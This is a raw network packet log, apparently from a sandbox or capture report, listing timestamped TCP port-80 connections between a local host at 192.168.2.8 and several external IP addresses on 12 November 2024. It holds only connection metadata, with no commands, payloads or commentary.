                                                                                                                                                            Nov 12, 2024 18:36:12.538012981 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.538360119 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.538372993 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.538383961 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.538419008 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.539938927 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.540026903 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.654593945 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.654633045 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.654644966 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.654674053 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.656656981 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.656668901 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.656685114 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.656697035 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.656703949 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.656712055 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.656738043 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.656759024 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:13.121701956 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.142062902 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.147491932 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.147578001 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.161725044 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.167515993 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.171435118 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.833102942 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.833211899 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.833225012 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.833492041 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.833734989 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.833749056 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.833769083 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.834096909 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.834657907 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.834673882 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.834686041 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.834784985 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.835717916 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.838603973 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.838972092 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.839103937 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.953073025 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.953092098 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.953110933 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.953264952 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.953550100 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.953562975 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.954051018 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.954063892 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.954077005 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.954155922 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.954155922 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.954909086 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.954921961 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.955018044 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.955445051 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.955457926 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.955858946 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.071424961 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.071579933 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.071594000 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.071851969 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.071943998 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.071955919 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.072122097 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.072454929 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.072465897 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.072479010 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.072515965 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.072578907 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.073334932 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.073559999 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.073570013 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.073666096 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.073834896 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.073853970 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.073868036 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.073932886 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.073932886 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.074873924 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.074886084 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.079528093 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.190169096 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.190270901 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.190284014 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.190434933 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.190656900 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.190670013 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.190761089 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.191159964 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.191170931 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.191258907 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.191291094 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.191485882 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.668981075 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:16.687462091 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:16.693665028 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:16.699299097 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:16.703464031 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:16.708734035 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.394593954 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.394747019 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.394757986 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.395087957 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.395100117 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.395112991 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.395127058 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.395212889 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.395982981 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.395994902 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.396004915 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.396015882 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.399446964 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.399446964 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.399931908 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.400073051 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.400264025 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.400310993 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.400496960 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.403614998 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.516433001 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.516463995 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.516477108 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.516566992 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.517123938 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.517302990 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.517313957 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.517324924 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.517330885 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.517473936 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.518163919 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.518176079 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.518450022 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.518716097 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.518727064 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.518738031 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.518749952 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.518913984 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.638215065 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.638289928 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.638309002 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.638665915 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.638679028 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.638710022 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.639230967 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.639242887 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.639269114 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.639451981 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.639636040 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.639648914 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.640197992 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.640211105 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.640233994 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.640748024 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.640758991 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.640773058 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.640778065 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.640841007 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.641475916 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.759896040 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.760015011 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.760029078 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.760055065 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.760088921 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.760533094 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.760552883 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.760631084 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.760977030 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.760998011 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.761030912 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:17.761039972 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.761069059 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.768071890 CET5001580192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:17.773204088 CET805001552.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:23.724829912 CET5375180192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:23.729799032 CET80537513.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:23.729906082 CET5375180192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:23.742079020 CET5375180192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:23.747134924 CET80537513.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:24.358824015 CET80537513.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:24.358876944 CET5375180192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:25.246855021 CET5375180192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:25.251810074 CET80537513.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:26.266855955 CET5375280192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:26.272964954 CET80537523.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:26.273046970 CET5375280192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:26.288425922 CET5375280192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:26.293354988 CET80537523.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:26.926728964 CET80537523.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:26.934226036 CET5375280192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:27.793653965 CET5375280192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:27.798744917 CET80537523.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:28.813524961 CET5375380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:28.819048882 CET80537533.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:28.821846008 CET5375380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:28.833564043 CET5375380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:28.840254068 CET80537533.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:28.840269089 CET80537533.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:29.467921972 CET80537533.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:29.471616030 CET5375380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:30.341372013 CET5375380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:30.346463919 CET80537533.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:31.363523960 CET5375480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:31.368468046 CET80537543.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:31.369090080 CET5375480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:31.387521029 CET5375480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:31.393193960 CET80537543.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:32.030256987 CET80537543.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:32.063004017 CET80537543.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:32.063112974 CET5375480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:32.070559978 CET5375480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:36:32.075608969 CET80537543.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:37.327296972 CET5375580192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:37.332285881 CET8053755142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:37.332346916 CET5375580192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:37.348830938 CET5375580192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:37.353672981 CET8053755142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:38.279871941 CET8053755142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:38.325576067 CET5375580192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:38.399544001 CET8053755142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:38.406059027 CET5375580192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:38.856189966 CET5375580192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:39.877717972 CET5375680192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:39.882780075 CET8053756142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:39.889698029 CET5375680192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:39.898668051 CET5375680192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:39.904490948 CET8053756142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:40.875412941 CET8053756142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:40.918664932 CET5375680192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:40.996145964 CET8053756142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:40.996216059 CET5375680192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:41.403179884 CET5375680192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:42.425757885 CET5375780192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:42.430792093 CET8053757142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:42.434464931 CET5375780192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:42.445817947 CET5375780192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:42.450826883 CET8053757142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:42.450956106 CET8053757142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:43.443495989 CET8053757142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:43.487335920 CET5375780192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:43.575160980 CET8053757142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:43.575216055 CET5375780192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:43.951575994 CET5375780192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:44.969753027 CET5375880192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:44.975946903 CET8053758142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:44.976026058 CET5375880192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:44.985394001 CET5375880192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:44.992042065 CET8053758142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:45.914990902 CET8053758142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:45.965548038 CET5375880192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:46.035090923 CET8053758142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:46.037955999 CET5375880192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:46.039068937 CET5375880192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:46.043844938 CET8053758142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:51.118037939 CET5375980192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:51.123123884 CET8053759172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:51.123692036 CET5375980192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:51.174268007 CET5375980192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:51.179338932 CET8053759172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:52.687625885 CET5375980192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:52.735912085 CET8053759172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:53.768682003 CET5376080192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:53.773752928 CET8053760172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:53.773855925 CET5376080192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:53.786096096 CET5376080192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:53.792047977 CET8053760172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:55.293840885 CET5376080192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:55.344079018 CET8053760172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:56.315823078 CET5376180192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:56.320751905 CET8053761172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:56.321108103 CET5376180192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:56.335053921 CET5376180192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:56.340128899 CET8053761172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:56.340953112 CET8053761172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:57.840790033 CET5376180192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:57.891838074 CET8053761172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:58.885652065 CET5376280192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:58.890697956 CET8053762172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:58.890763044 CET5376280192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:58.900525093 CET5376280192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:58.905374050 CET8053762172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:59.604793072 CET8053759172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:59.604852915 CET5375980192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:37:02.249573946 CET8053760172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:02.249644041 CET5376080192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:37:04.805882931 CET8053761172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:04.805932999 CET5376180192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:37:07.373656988 CET8053762172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:07.373756886 CET5376280192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:37:07.374953985 CET5376280192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:37:07.381144047 CET8053762172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:12.407727957 CET5376380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:12.412792921 CET80537633.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:12.412879944 CET5376380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:12.427748919 CET5376380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:12.432847977 CET80537633.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:13.050801039 CET80537633.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:13.050868988 CET5376380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:13.934566021 CET5376380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:13.939519882 CET80537633.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:14.954058886 CET5376480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:14.959243059 CET80537643.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:14.959340096 CET5376480192.168.2.83.33.130.190
